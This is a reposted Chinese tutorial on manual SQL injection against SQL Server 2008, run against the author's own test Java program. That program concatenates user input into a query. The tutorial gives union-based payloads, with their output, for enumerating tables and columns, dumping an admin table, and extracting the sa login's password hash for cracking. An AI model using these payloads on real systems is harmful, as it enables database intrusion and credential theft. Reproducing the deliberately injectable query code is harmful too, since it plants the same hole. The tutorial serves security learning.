sqlServer2008 手工注入
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了sqlServer2008 手工注入,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含3417字,纯文字阅读大概需要5分钟。
内容图文
接着上一篇的《mysql手工注入》
参考:http://hi.baidu.com/ciqing_s/item/971bf994365130accc80e5ed
http://hi.baidu.com/moon4ins/item/ed3b181ae472cce139cb30c4
必备知识:
MSSQL注释符号: // 或 – --
也就是说上面两个符号后面的内容会被忽略
环境:
代码还是之前的代码
public class TestSql { public static void main(String[] args) throws InstantiationException, IllegalAccessException, ClassNotFoundException, SQLException { DateExecute de = new DateExecute("MSSQL", "sa", "xxxxxxx","school"); String name = "mynona"; String address="gdut"; name = "mynona‘ and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--"; String sql ="select * from student where name = ‘" + name + "‘ and address = ‘" + address +"‘"; //sql = "select name, password_hash from sys.sql_logins"; System.out.println("执行sql:"); System.out.println(sql); System.out.println("输出结果:"); System.out.println(de.getDateList(sql)); } }
数据库:
目标:
我们看一下视图,发现和mysql很像
可以看到有INFORMATION.SCHEMA.TABLES和INFORMATION.SCHEMA.COLUMNS表
我们完全可以利用mysql手工注入的方法
在上面的视图里面,再往下:
我们的目标就是上面那个表的name和password
查看当前select字段数
name = "mynona‘ order by 1--"; ok name = "mynona‘ order by 2--"; ok name = "mynona‘ order by 3--"; ok name = "mynona‘ order by 4--"; error
可以得出当前select 语句字段数是3
暴数据库名:
name = "mynona‘ and 1=2 union select 1,db_name(),3--";
执行sql:
select * from student where name = ‘mynona‘ and 1=2 union select 1,db_name(),3--‘ and address = ‘gdut‘
输出结果:
[{id=1, address=3, name=school}]
可是数据库名为school
遍历当前数据库的表
name = "mynona‘ and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--";
执行sql:
select * from student where name = ‘mynona‘ and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--‘ and address = ‘gdut‘
输出结果:
[{id=1, address=admin, name=2}, {id=1, address=student, name=2}, {id=1, address=sysdiagrams, name=2}]
可知表为:admin, school , sysdiagrams
遍历指定admin的字段
name = "mynona‘ and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = ‘admin‘--";
执行sql:
select * from student where name = ‘mynona‘ and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = ‘admin‘--‘ and address = ‘gdut‘
输出结果:
[{id=1, address=id, name=2}, {id=1, address=name, name=2}, {id=1, address=password, name=2}]
可知表admin的字段为:id, name, password
遍历admin表数据:
name = "mynona‘ union select id, name, password from admin--";
执行sql:
select * from student where name = ‘mynona‘ union select id, name, password from admin--‘ and address = ‘gdut‘
输出结果:
[{id=1, address=mynona, name=admin}, {id=1, address=gdut, name=mynona}]
即:id=1, address=mynona, name=admin
遍历sys.sql_logins表
name = "mynona‘ and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";
执行sql:
select * from student where name = ‘mynona‘ and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--‘ and address = ‘gdut‘
输出结果:
[{id=1, address=0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a, name=sa}, {id=1, address=0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f, name=##MS_PolicyEventProcessingLogin##}, {id=1, address=0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f, name=##MS_PolicyTsqlExecutionLogin##}]
可以得到:用户sa的password_hash 为0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a
拿这个hash值破解就可以得到sa的密码了
这篇和上一篇的源文件和测试项目下载地址:
http://download.csdn.net/detail/mmyzlinyingjie/7095041
原文:http://www.cnblogs.com/mynona/p/3622863.html
内容总结
以上是互联网集市为您收集整理的sqlServer2008 手工注入全部内容,希望文章能够帮你解决sqlServer2008 手工注入所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。